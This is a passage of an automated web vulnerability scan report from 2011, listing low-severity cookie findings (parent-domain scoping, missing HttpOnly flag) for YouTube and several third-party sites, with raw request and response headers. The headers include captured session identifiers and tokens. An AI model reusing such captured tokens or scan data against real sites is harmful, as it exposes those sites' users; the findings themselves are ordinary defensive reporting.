Set-Cookie: GEO=0ac3bef9549e0537693aa5a5040a2cc1cwsAAAAzVVOtwdbzTUsQhg==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nLThsU052OXJEdFVlejlPay04TThSVTJPX0JrcnNENkw4RWxMVVR1WXR6NTJ4UXVjZUZhZUVn -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...

12.118. http://www.youtube.com/results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /results

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /results HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 303 See Other
Date: Thu, 03 Feb 2011 20:31:02 GMT
Server: wiseguy/0.6.7
Content-Length: 0
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=p_3XtJzUdAA; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 20:31:02 GMT
Set-Cookie: PREF=f1=40000000; path=/; domain=.youtube.com; expires=Sun, 31-Jan-2021 20:31:02 GMT
Set-Cookie: GEO=3ffc2890db51791205b22cddaf014b18cwsAAAAzR0KtwdbzTUsQhg==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Location: http://www.youtube.com/das_captcha?next=http%3A//www.youtube.com/results
Connection: close


12.119. http://www.youtube.com/watch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /watch

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /watch HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 303 See Other
Date: Thu, 03 Feb 2011 20:31:11 GMT
Server: wiseguy/0.6.7
Content-Length: 0
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=6cozJg7zW60; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 20:31:11 GMT
Set-Cookie: PREF=f1=40000000; path=/; domain=.youtube.com; expires=Sun, 31-Jan-2021 20:31:11 GMT
Set-Cookie: GEO=5215e3002360f495295dadfdb5ac7728cwsAAAAzR0KtwdbzTUsQjw==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Location: http://www.youtube.com/das_captcha?next=http%3A%2F%2Fwww.youtube.com%2Fwatch&ytsession=gFFnYQPQRZei0KJ49_8IeIUahsnsMHr7oYIMKK5868J_j-kq7g_jXG5m3SrDzR3dKcNGn9GPj25jQnXh4G8HkkqzZ4KyS4PLJ9PgHphPV3BzyZ9KSNO5Yk9UzwaXSGN_Vg0UM9PUXV8kUife1yyvmrlt6oT1dH8V1DiEtVG3Fz-7f617mCTcbAgfZe4Fpx0RMmVtvrYCqsf1wHg5fTeRc8GUfCDHSnQhnqRkOYpNTv0pe-bFnDwyyqbuY8D7akqvSIHIR5LqI0t4T4PmsSI2KXKOItHUgPZzsc2imD_xIVG2oSBseqOSnA
Connection: close


13. Cookie without HttpOnly flag set  previous  next
There are 289 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



13.1. http://abcconstructioninc.com/x22  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://abcconstructioninc.com
Path:   /x22

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /x22 HTTP/1.1
Host: abcconstructioninc.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 15323
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
p3p: CP="CAO PSA OUR"
Set-Cookie: SessionID=22146804-4bfb-4cf6-b5b2-7bacae0829d7; path=/
Set-Cookie: VisitorID=60133734-1246-4af2-baac-a1202fcd04b6&Exp=2/3/2014 12:31:23 PM; expires=Mon, 03-Feb-2014 20:31:23 GMT; path=/
Set-Cookie: yahooToken=qs=06oENya4ZG1YS6vOLJwpLiFdjG98_E6OGGJCFiX0NgKsoOxXTlKV4uDkZj86FG0dTFH0nLV2clUI7HjyzVrEXGgiu0vRU5p5INcpx4T8lOhJVhTOm4Ja9LYYjqIqKfGNHYAbvQ37XuTFpoMjb7IzwhzqRnqas1280STELPvNwWooR-0l5LusXktjPWwdMaks8xcGwlV0_lATJtNiA2A63kzUzbpN2qqNDG,YT0zO2s9MTA.; path=/
X-Powered-By: ASP.NET
Date: Thu, 03 Feb 2011 20:31:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Cont
...[SNIP]...

13.2. http://advertise.tucows.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://advertise.tucows.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: advertise.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:03:27 GMT
Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=6299093c20d21df56a507e2d4f08aada; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 6299093c20d21df56a507e2d4f08aada=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 84850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Free Software and Sh
...[SNIP]...

13.3. http://comcast.usdirect.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://comcast.usdirect.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: comcast.usdirect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:32:10 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Set-Cookie: PHPSESSID=3c6d8370b754a2d4c61e45b8e079762f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18497

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Comcast Cable Deals | Comcast High Speed Internet &amp; Cable TV Promotions</title>
<meta name="keywords" content="
...[SNIP]...

13.4. http://discussions.apple.com/category.jspa  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://discussions.apple.com
Path:   /category.jspa

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /category.jspa?categoryID=267 HTTP/1.1
Host: discussions.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Thu, 03 Feb 2011 17:52:12 GMT
Cache-Control: no-cache, private, no-store, must-revalidate
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
X-JSL: D=294800 t=1296755532795225
Vary: User-Agent
Date: Thu, 03 Feb 2011 17:52:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: acare_d=1024; Domain=apple.com; Path=/
Set-Cookie: JSESSIONID=78E7AA868D862C51B6C77B79C00ACA61.node0; Path=/
Set-Cookie: BIGipServerPool_182_7000=1880656138.22555.0000; path=/
Content-Length: 72460


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
   <head>
       <title>Apple - Support - Discussions - iPad</title>
<meta htt
...[SNIP]...

13.5. http://ir.supermedia.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ir.supermedia.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: ir.supermedia.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296762069|check#true#1296760269; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:09:40 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: NOMOBILE=0;path=/
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:09:40 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:09:40 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:09:40 GMT;path=/
Vary: Accept-Encoding
Content-Length: 17691


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>SuperMedia - Investor Relations</title>

<meta http-equiv="Conte
...[SNIP]...

13.6. http://ir.supermedia.com/InvestorKit.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ir.supermedia.com
Path:   /InvestorKit.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /InvestorKit.cfm HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:36:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A22%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:22 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:22 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:22 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>SuperMedia - Printed Materials</title>

<meta http-equiv="Conten
...[SNIP]...

13.7. http://ir.supermedia.com/common/mobile/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ir.supermedia.com
Path:   /common/mobile/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /common/mobile/?CompanyID=VERIZONINFO HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:37:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A37%3A15%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:37:15 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:37:15 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:37:15 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8
...[SNIP]...

13.8. http://ir.supermedia.com/contactus.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ir.supermedia.com
Path:   /contactus.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /contactus.cfm HTTP/1.1
Host: ir.supermedia.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NOMOBILE=0; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; mbox=session#1296759528614-838261#1296763633|check#true#1296761833; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:36:57 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:57 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:57 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:57 GMT;path=/
Vary: Accept-Encoding
Content-Length: 21608


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>SuperMedia - Contact Us</title>

<meta http-equiv="Content-Type"
...[SNIP]...

13.9. http://ir.supermedia.com/disclaimer.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ir.supermedia.com
Path:   /disclaimer.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /disclaimer.cfm HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:36:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A00%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:00 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:00 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:00 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>SuperMedia - Press Releases</title>

<meta http-equiv="Content-T
...[SNIP]...

13.10. http://ir.supermedia.com/downloads.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ir.supermedia.com
Path:   /downloads.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /downloads.cfm HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:36:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A22%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:22 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:22 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:22 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>SuperMedia - Download Library</title>

<meta http-equiv="Content
...[SNIP]...

13.11. http://ir.supermedia.com/eventdetail.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ir.supermedia.com
Path:   /eventdetail.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /eventdetail.cfm?EventID=92127 HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:36:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A17%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:17 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:17 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:17 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>SuperMedia - Events & Presentations</title>

<meta http-equiv="C
...[SNIP]...

13.12. http://ir.supermedia.com/events.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ir.supermedia.com
Path:   /events.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /events.cfm HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:37:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A37%3A18%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:37:19 GMT;path=/
Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:37:19 GMT;path=/
Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:37:19 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>SuperMedia - Events & Presentations</title>

<meta http-equiv="C
...[SNIP]...

13.13. http://ir.supermedia.com/faq.cfm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ir.supermedia.com
Path:   /faq.cfm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /faq.cfm HTTP/1.1
Host: ir.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 19:36:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A02%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:02 GMT;path=/
